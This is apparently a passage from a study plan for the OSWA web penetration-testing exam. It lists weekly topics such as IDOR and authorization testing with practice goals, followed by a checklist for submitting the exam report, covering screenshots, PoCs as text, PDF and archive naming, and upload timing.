IDOR, two-account matrices, horizontal/vertical authorization, chaining

Gate: Demonstrate an unauthorized operation with a single-variable replay.

Week 12

Unknown challenge targets, five-target simulation, screenshots, reporting, logistics

Gate: Score 80+ with complete evidence and produce the report without reopening targets.

REPORTING / SUBMISSION

Grab evidence .md ↓
  • All local.txt and proof.txt values were entered into the Exam Control Panel before the active exam ended.
  • Every awarded objective has the required browser/proxy or shell/original-location screenshot.
  • Every attack is reproducible from the report, including commands, requests, output, callbacks, and PoCs.
  • Scripts and PoCs are included as text inside the PDF.
  • The final PDF was rendered and visually reviewed.
  • PDF name: OSWA-OS-XXXXX-Exam-Report.pdf.
  • Archive name: OSWA-OS-XXXXX-Exam-Report.7z.
  • The .7z is not password protected and is no larger than 200 MB.
  • The archive was uploaded within 24 hours after the active exam.
  • The upload MD5 matches the local md5sum output.

SOURCES